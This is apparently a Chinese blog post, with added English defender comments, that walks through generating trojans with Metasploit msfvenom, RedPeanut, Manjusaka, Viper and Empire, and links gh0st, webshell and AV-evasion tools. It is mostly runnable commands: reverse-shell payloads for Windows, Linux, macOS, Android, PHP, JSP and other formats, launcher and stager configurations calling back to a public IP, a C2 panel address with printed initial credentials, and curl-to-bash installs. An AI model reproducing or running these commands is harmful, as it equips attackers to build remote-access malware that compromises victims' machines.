总想去抓住光,可它没有形状,抓不住也不敢直视。

# 1.msf 生成木马

参考地址:https://blog.csdn.net/qq_42094992/article/details/109004560

# msfvenom (Metasploit) invocations, one per output format. Every payload named
# below is a reverse-connect type: when the generated file runs, that host opens
# an outbound TCP connection to LHOST:LPORT. LHOST here (192.168.200.209) is an
# RFC 1918 private address, i.e. a lab network.
# Defender view: no encoder or custom template is passed, so these are stock
# outputs of the kind endpoint protection commonly signatures; on the network
# side the relevant controls are egress filtering and alerting on outbound
# connections from hosts to unexpected addresses and ports (8888 here).
# Each command redirects msfvenom's stdout into ~/Trojan/MSF_Trojan/.

# Windows: x64 PE executable, Meterpreter over reverse TCP
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f exe > ~/Trojan/MSF_Trojan/MSF_windows_reverse.exe

# Linux: x64 ELF executable, Meterpreter over reverse TCP
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f elf > ~/Trojan/MSF_Trojan/MSF_linux_reverse.elf

# macOS: x64 Mach-O executable, plain command shell (not Meterpreter)
msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f macho > ~/Trojan/MSF_Trojan/MSF_mac_reverse.macho

# Android: APK output, Meterpreter over reverse TCP
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 R > ~/Trojan/MSF_Trojan/MSF_android_reverse.apk

# PHP: raw PHP source. Like the jsp/asp/war entries below this is a server-side
# script format; file-integrity monitoring on web roots and upload directories
# that cannot execute scripts are the relevant mitigations.
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_php_reverse.php

# JSP: raw JSP page carrying a command-shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_jsp_reverse.jsp

# ASP: classic ASP page wrapping a Windows Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f asp > ~/Trojan/MSF_Trojan/MSF_asp_reverse.asp

# WAR: the same JSP shell payload packaged as a Java web archive
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f war > ~/Trojan/MSF_Trojan/MSF_war_reverse.war

# Labelled "python" by the author.
# NOTE(review): the payload named here is a generic cmd/unix one, so the .py
# extension does not by itself mean the output is Python source -- confirm.
msfvenom -p cmd/unix/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_python_reverse.py

# Perl: raw one-line command payload
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_perl_reverse.pl

# sh: raw one-line bash command payload
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_sh_reverse.sh

# Java JAR -- author's note: this one is not needed
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f jar > ~/Trojan/MSF_Trojan/MSF_java_reverse.jar
# Local helper script run on a JAR; the script itself is not shown on this page.
./tools/jar2exe/jar2exe.sh MSF_java.jar MSF_java.class

# 2.RedPeanut 生成木马

github 地址:https://github.com/b4rtik/RedPeanut

# Install dotnet: register Microsoft's RHEL/CentOS 7 package feed, install the
# .NET Core 2.2 SDK, then build and start the project.
# NOTE(review): .NET Core 2.2 reached end of support in December 2019 and no
# longer receives security fixes; keep a host carrying it isolated from
# production networks.
rpm -Uvh https://packages.microsoft.com/config/rhel/7/packages-microsoft-prod.rpm
yum install dotnet-sdk-2.2
# Bare `dotnet` only prints usage; it confirms the SDK is on PATH.
dotnet
# Presumably run from the RedPeanut source checkout -- the cd is not shown.
dotnet build
dotnet run

# RedPeanut console input (not shell commands). First an HTTP listener is
# defined, then one launcher is generated per delivery format; each launcher
# is pointed at the same listener address and port.
# lhost/lport are the author's own values as published; for lab work
# substitute an address on an isolated test network.
# The ATT&CK technique IDs below are added for detection mapping.

# Configure the listener
c2 list
listener options http
set name RedPeanut_listener
set lhost 47.102.120.55
set lport 4444
run

# exe launcher: standalone Windows executable
launcher
exe
set filename RedPeanut_exe.exe
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

# dll launcher: needs a host process to load it; how it is loaded is not
# shown on this page.
launcher
dll
set filename RedPeanut_dll.dll
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

# powershell launcher (ATT&CK T1059.001). Detection: PowerShell script block
# logging (Event ID 4104) and AMSI-aware endpoint protection.
launcher
powershell
set filename RedPeanut_ps1.ps1
set hosted False
set lport 4444
set profile 2
options
run

# HTA launcher (author's label: vbs, powershell); HTA files are run by
# mshta.exe (ATT&CK T1218.005). Detection: mshta.exe spawning child processes
# or making network connections.
launcher
hta
set filename RedPeanut_hta.hta
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

# InstallUtil launcher (ATT&CK T1218.004). Detection: InstallUtil.exe
# executing outside a software-installation context.
launcher
installutil
set filename RedPeanut_installutil.installutil
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

# MSBuild launcher (ATT&CK T1127.001). Detection: MSBuild.exe running on
# non-developer hosts or started by Office or script-host parents.
launcher
msbuild
set filename RedPeanut_msbuild.msbuild
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

# Macro/VBA launcher (ATT&CK T1059.005). Mitigation: block macros in files
# from the internet and enable Office attack-surface-reduction rules.
launcher
vba
set filename RedPeanut_vba.vba
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

# 3.Manjusaka 生成木马

github 地址:https://github.com/YDHCUI/manjusaka/releases

# Mark the downloaded release binary executable and start it.
# NOTE(review): this is a pre-built binary taken from a releases page; nothing
# here verifies its provenance, so run it as an unprivileged user inside an
# isolated VM.
chmod +x manjusaka
./manjusaka

# Web interface and initial credentials (the two lines below are notes, not
# commands).
# NOTE(review): the panel URL is plain http://, so the login crosses the
# network unencrypted, and the initial password is printed on this page:
# treat it as disclosed and change it before the panel is reachable by others.
http://47.102.120.55:3200/manjusaka/static/
初始用户: manjusaka 密码: 402432f678e74cb7

# 4.Viper 生成木马

使用教程:https://www.yuque.com/vipersec/help/olg1ua

# One-step install through the f8x bootstrap script.
# sysctl -w changes the running kernel only; the value is not persisted across
# a reboot.
sysctl -w vm.max_map_count=262144
# NOTE(review): the next two lines download a script and hand it to bash with
# no integrity check. Read the saved file, and ideally compare it against a
# known-good checksum, before executing it, especially as root.
curl -o f8x https://f8x.io/ # wget -O f8x https://f8x.io/
bash f8x -viper

# Open the web UI to generate payloads (the two lines below are notes, not
# commands): "vpsip" stands for the server's address, the user is root and the
# password is the one chosen during installation.
https://vpsip:60000/#/user/login
用户名:root 密码:****自定义密码**

# 5.Empire 生成木马

github 地址:https://github.com/EmpireProject/Empire
使用教程:https://blog.csdn.net/u013930899/article/details/124871901 https://www.cnblogs.com/yokan/p/13179730.html

# Set up the environment: pull the Empire image and open an interactive shell
# in a container named "empire", publishing container port 7000 on the host.
# NOTE(review): the image is pulled by its mutable default tag, not by digest,
# so its contents are not pinned. The upstream EmpireProject repository is, as
# far as I know, no longer maintained -- confirm -- so treat the image as
# unpatched and keep it on an isolated lab host.
docker pull empireproject/empire
docker run -it -p 7000:7000 --name empire empireproject/empire /bin/bash

# pip must be upgraded first (translation of the author's note on the next
# line, which is kept verbatim: it begins with a stray zero-width space, so a
# shell would not parse it as a comment).
​#需要先升级pip
# NOTE(review): get-pip.py is downloaded and executed with no integrity check,
# and it targets Python 2.7, which has been end-of-life since January 2020.
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python get-pip.py

# Install the missing dependency: expose pip2.7 as `pip`, add pefile (version
# not pinned), then start the Empire console as root.
ln -s /usr/local/bin/pip2.7 /usr/bin/pip
pip install pefile
sudo ./empire

# Empire console input (not shell commands): create an HTTP listener named
# "bk" on port 8888, then select a stager bound to that listener and generate
# it.
# Defender view: with an HTTP listener, staging and tasking ride on web
# requests to port 8888, so web-proxy logs and alerts on outbound connections
# to non-standard ports give network-side visibility. Empire's Windows
# launchers are PowerShell-based, which makes script block logging
# (Event ID 4104) and AMSI relevant on the endpoint.
listeners
uselistener http
info
set Name bk
set Port 8888
execute
back
# Stager types the author tried, each bound to listener "bk"
# (windows/launcher_bat appears twice).
usestager windows/launcher_bat bk
usestager multi/bash bk
usestager windows/dll bk
usestager windows/wmic bk
usestager windows/launcher_bat bk
usestager windows/launcher_vbs bk
info
execute

# 6. 大灰狼远控

github 地址:https://github.com/0xCuSO4/DHLYK

#实际生成的源码是在bilibili找到的,链接没找到

# 7. 大马

github 地址:https://github.com/Aabyss-Team/WebShell

# 8.gh0st

github 地址:https://github.com/iGh0st/gh0st3.6_src https://github.com/SecurityNo1/Gh0st2023 https://github.com/Cc28256/CcRemote/

#环境没有配置好,没有生成此工具的马

# 9.Shellcode to exe

github 地址:https://github.com/NyDubh3/CuiRi https://github.com/1y0n/AV_Evasion_Tool
简介:掩日 - 免杀执行器生成工具,可将 shellcode 加载为可执行 exe

#环境没有配置好,没有生成此工具的马
